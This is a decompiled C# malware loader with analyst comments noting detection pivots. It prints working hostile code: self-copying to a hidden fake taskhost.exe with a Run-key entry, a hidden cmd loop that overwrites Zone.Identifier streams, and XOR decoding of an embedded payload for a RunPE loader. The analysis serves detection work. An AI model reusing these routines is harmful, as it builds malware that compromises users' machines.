// Decompiled with JetBrains decompiler
// Type: smss.ReadResource
// Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// Analyst summary (derived only from the code visible in this file):
//   * Main() runs DisableSecurity(), then Startup(), then decodes an embedded resource
//     and hands the bytes to RunpeClass.RunpeSub, which is not defined in this file.
//   * Host artifacts to look for: a Hidden file at %windir%\temp\taskhost.exe, an
//     HKCU\Software\Microsoft\Windows\CurrentVersion\Run value whose name AND data are
//     that path, and a windowless cmd child that overwrites Zone.Identifier streams.
//   * Every routine wraps its body in a catch-all that discards the exception, so a step
//     that fails leaves no error output.
//   * The family label in the "Assembly location" path comes from the corpus file name;
//     this type shows loader/persistence logic only.
//   * NOTE(review): "smss" and "taskhost.exe" are also names of Windows components,
//     presumably chosen to blend in. A taskhost.exe under %windir%\temp is not the
//     System32 binary.
namespace smss
{
  [StandardModule]
  internal sealed class ReadResource
  {
    // Drop location for the persistent copy: <windir>\temp\taskhost.exe (boxed string).
    private static object _tPath = (object) (Environment.GetEnvironmentVariable("windir") + "\\temp\\taskhost.exe");
    // File name of the running executable. ModuleName carries no directory part, so every
    // use below as a path resolves against the current working directory.
    private static object _proc = (object) Process.GetCurrentProcess().MainModule.ModuleName;

    // Persistence routine: copies the running image to _tPath, marks the copy Hidden and
    // registers it under the per-user Run key. Takes no parameters, returns nothing and
    // never throws (all exceptions are discarded).
    public static void Startup()
    {
      try
      {
        // Copy only when the target is absent; the overwrite flag is therefore moot.
        if (!File.Exists(Conversions.ToString(ReadResource._tPath)))
          File.Copy(Conversions.ToString(ReadResource._proc), Conversions.ToString(ReadResource._tPath), true);
        // Add the Hidden attribute on top of whatever attributes the file already has.
        File.SetAttributes(Conversions.ToString(ReadResource._tPath), File.GetAttributes(Conversions.ToString(ReadResource._tPath)) | FileAttributes.Hidden);
        // Open the HKCU Run key writable (second argument true).
        RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        // Nothing to do if the key is missing or a value named after the drop path exists.
        if (registryKey == null || registryKey.GetValue(Conversions.ToString(ReadResource._tPath)) != null)
          return;
        // Value name and value data are both the full drop path. A Run value whose *name*
        // is a file path is a useful hunting pivot (registry value-set telemetry).
        registryKey.SetValue(Conversions.ToString(ReadResource._tPath), RuntimeHelpers.GetObjectValue(ReadResource._tPath));
      }
      catch (Exception ex)
      {
        // VB-style error swallowing: the exception is recorded and immediately cleared.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    // Mark-of-the-Web tampering: drives a hidden cmd through redirected stdin to overwrite
    // the Zone.Identifier alternate data stream of files whose name contains _proc.
    // Takes no parameters, returns nothing and never throws.
    public static void DisableSecurity()
    {
      try
      {
        Process process = new Process();
        ProcessStartInfo processStartInfo1 = new ProcessStartInfo();
        ProcessStartInfo processStartInfo2 = processStartInfo1;
        // "cmd" with no window and redirected stdin/stdout: commands are typed into the
        // shell, so they do not appear on the child's command line. Detection has to key
        // on the parent/child pair and on the stream writes rather than on cmd arguments.
        processStartInfo2.FileName = "cmd";
        processStartInfo2.RedirectStandardInput = true;
        processStartInfo2.RedirectStandardOutput = true;
        processStartInfo2.UseShellExecute = false;
        processStartInfo2.CreateNoWindow = true;
        process.StartInfo = processStartInfo1;
        process.Start();
        // stdout is redirected but never read; it is only closed at the end.
        using (StreamReader standardOutput = process.StandardOutput)
        {
          using (StreamWriter standardInput = process.StandardInput)
          {
            // The two-argument WriteLine treats the first string as a format string and
            // AppWinStyle.Hide as a format argument; the strings built here contain no
            // placeholder, so the extra argument does not change what is written.
            // NOTE(review): _tPath names a file, not a directory, so this cd presumably
            // fails and cmd stays in its inherited working directory. Confirm in a sandbox.
            standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject((object) "cd ", ReadResource._tPath)), (object) AppWinStyle.Hide);
            // FOR /R walks the directory tree from cmd's current directory. For each file
            // matching *<_proc>* it redirects the output of "ECHO." into
            // <file>:Zone.Identifier, replacing the stored zone data with a blank line.
            // Stream creation of this kind is visible to ADS-aware telemetry
            // (e.g. Sysmon event ID 15, FileCreateStreamHash).
            standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object) "FOR /R %I IN (*", ReadResource._proc), (object) "*) DO > %I:Zone.Identifier ECHO.")), (object) AppWinStyle.Hide);
            standardInput.WriteLine("exit");
            standardInput.Close();
          }
          standardOutput.Close();
        }
      }
      catch (Exception ex)
      {
        // Failures (cmd not started, pipe closed, format error) are discarded.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    // kernel32 resource APIs used by Main() to reach the embedded payload. No LockResource
    // import is declared; Main() passes the LoadResource result straight to Marshal.Copy.
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);

    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr LoadResource(IntPtr hModule, IntPtr fr);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern int SizeofResource(IntPtr hModule, IntPtr fr);

    // Entry point. Order of operations: Zone.Identifier tampering, persistence, then
    // decode the embedded resource and pass it to RunpeClass.RunpeSub with the current
    // module name. Never throws; the decode/launch stage is wrapped in a catch-all.
    [STAThread]
    public static void Main()
    {
      ReadResource.DisableSecurity();
      ReadResource.Startup();
      try
      {
        string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
        IntPtr moduleHandle = ReadResource.GetModuleHandle(ref moduleName);
        // Both arguments are strings, so this looks up a resource named "0" under a type
        // *named* "RT_RCDATA" rather than the numeric RT_RCDATA type.
        // NOTE(review): confirm against the sample's PE resource directory.
        IntPtr resource = ReadResource.FindResource(moduleHandle, "0", "RT_RCDATA");
        // None of the returned handles is checked for IntPtr.Zero.
        IntPtr source = ReadResource.LoadResource(moduleHandle, resource);
        int length = ReadResource.SizeofResource(moduleHandle, resource);
        // "length - 1 + 1 - 1 + 1" is decompiler residue and equals length.
        byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
        Marshal.Copy(source, numArray, 0, length);
        // The last four bytes of the resource are read as the Int32 seed of the keystream.
        int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
        // The destination array has numArray.Length - 2 elements, so the working copy
        // still includes the first two of the four trailing seed bytes.
        byte[] data = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
        // The keystream is System.Random output for that seed, one byte per payload byte.
        // The obfuscation key therefore ships inside the resource itself, which lets an
        // analyst recover the payload statically from the extracted resource.
        Random random = new Random(int32_1);
        byte[] buffer = new byte[data.Length - 1 + 1 - 1 + 1];
        random.NextBytes(buffer);
        int int32_2 = Convert.ToInt32(data.Length - 1);
        // In-place XOR of every payload byte with the matching keystream byte.
        for (int index = 0; index <= int32_2; ++index)
          data[index] = Convert.ToByte((byte) ((int) data[index] ^ (int) buffer[index]));
        // RunpeClass is defined elsewhere. NOTE(review): the name suggests a "RunPE"
        // in-memory loader that takes the decoded bytes and a host image name; confirm
        // against the RunpeClass source before stating the injection technique.
        RunpeClass.RunpeSub(data, Conversions.ToString(ReadResource._proc));
      }
      catch (Exception ex)
      {
        // A missing resource, bad length or loader failure is discarded.
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
  }
}